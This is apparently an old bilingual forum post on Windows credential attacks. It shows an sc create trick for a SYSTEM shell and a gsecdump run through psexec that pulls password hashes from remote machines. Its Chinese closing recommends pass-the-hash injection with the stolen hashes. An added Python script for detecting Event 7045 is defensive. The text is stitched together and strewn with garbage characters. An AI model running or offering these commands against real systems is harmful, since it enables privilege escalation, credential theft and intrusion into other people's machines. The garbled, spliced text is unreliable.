
Hash injection attack

Posted 2012-11-6 21:09:29
To get a DOS prompt as NT SYSTEM:

C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
[SC] CreateService SUCCESS

C:\>sc start shellcmdline
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

C:\>sc delete shellcmdline
[SC] DeleteService SUCCESS

Error 1053 is expected: cmd.exe never reports back to the Service Control Manager, so the SCM times out and kills it, but by then the inner "start" has already spawned a second cmd.exe running as LocalSystem, and "type= interact" puts that window on the console desktop. This relies on services sharing Session 0 with the console user, as on Windows XP/2003; on Vista and later, services are isolated in Session 0 and the window does not appear on the user's desktop.

------------
, O, }& O  L1 J: J2 l
Then in the new DOS window:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM

C:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)
usage: gsecdump [options]

options:
-h [ --help ] show help
-a [ --dump_all ] dump all secrets
-l [ --dump_lsa ] dump lsa secrets
-w [ --dump_wireless ] dump microsoft wireless connections
-u [ --dump_usedhashes ] dump hashes from active logon sessions
-s [ --dump_hashes ] dump hashes from SAM/AD

Although I like to use:

PsExec v1.83 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - www.sysinternals.com

C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT

to get the hashes from active logon sessions of a remote system.

These are a lot better than getting a cachedump of the cached credentials, because these hashes are LM hashes that can easily be broken with rainbow tables.
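Both techniques above leave the same artefact on the target: a new service is registered (by hand with sc create, or PSEXESVC when PsExec is run with -s -c), and the Service Control Manager writes that to the System log as Event ID 7045 ("A service was installed in the system"). The script below is an added example, not code from the original post or from the linked article, written in Python so that it runs anywhere the log export can be read. It parses constructed 7045 records flattened to key=value text (the field names and that flattening are assumptions for the example, not the native event XML) and flags the two patterns shown on this page.

```python
import re

# Binaries that should never be a service's image path; the sc create trick uses cmd.exe.
SHELL_BINARIES = {"cmd.exe", "powershell.exe", "pwsh.exe", "cscript.exe", "wscript.exe"}

# Constructed sample records (not real logs): System-log Event ID 7045
# ("A service was installed in the system") flattened to key=value text.
SAMPLE_EVENTS = [
    r'EventID=7045 ServiceName=shellcmdline ImagePath="C:\WINDOWS\system32\cmd.exe /K start" ServiceType="user mode service" StartType="demand start" AccountName=LocalSystem',
    r'EventID=7045 ServiceName=PSEXESVC ImagePath="C:\WINDOWS\PSEXESVC.exe" ServiceType="user mode service" StartType="demand start" AccountName=LocalSystem',
    r'EventID=7045 ServiceName=BackupAgent ImagePath="C:\Program Files\Backup\agent.exe" ServiceType="user mode service" StartType="auto start" AccountName=LocalSystem',
    r'EventID=7036 ServiceName=Spooler State=running',
]

_KV = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


def parse_record(line: str) -> dict:
    """Split a flattened record into fields; quoted values may contain spaces."""
    return {key: quoted or bare for key, quoted, bare in _KV.findall(line)}


def image_basename(image_path: str) -> str:
    """Executable name from an image path, ignoring arguments such as '/K start'."""
    m = re.search(r'([^\\/"]+\.exe)', image_path, re.IGNORECASE)
    return m.group(1).lower() if m else ""


def classify(fields: dict) -> list:
    """Reasons a 7045 record looks like the SYSTEM-shell or PsExec pattern (empty if benign)."""
    if fields.get("EventID") != "7045":
        return []
    reasons = []
    exe = image_basename(fields.get("ImagePath", ""))
    if exe in SHELL_BINARIES:
        reasons.append(f"image path is a command interpreter ({exe})")
    if fields.get("ServiceName", "").upper() == "PSEXESVC" or exe == "psexesvc.exe":
        reasons.append("PsExec service (PSEXESVC) installed")
    if reasons and fields.get("AccountName", "").lower() == "localsystem":
        reasons.append("runs as LocalSystem")
    return reasons


def find_suspicious(lines) -> dict:
    """Map service name -> reasons for every record that trips a rule."""
    hits = {}
    for line in lines:
        fields = parse_record(line)
        reasons = classify(fields)
        if reasons:
            hits[fields["ServiceName"]] = reasons
    return hits


if __name__ == "__main__":
    for name, why in find_suspicious(SAMPLE_EVENTS).items():
        print(f"{name}: {'; '.join(why)}")
```

The image-path rule is a heuristic, so tune SHELL_BINARIES to the environment; a 7045 immediately followed by a service start timeout (Event 7009 or 7000) for the same service name, as in the sc start failure above, makes the signal much stronger.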

3 M$ j& f- }! |8 ^3 g提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.2 |9 S0 Z' y: `6 p" [/ K3 w
原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]
( {3 y' V$ W4 N- O
' S3 X4 I# ]) o我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。
! w; l; n: v3 ]8 w( M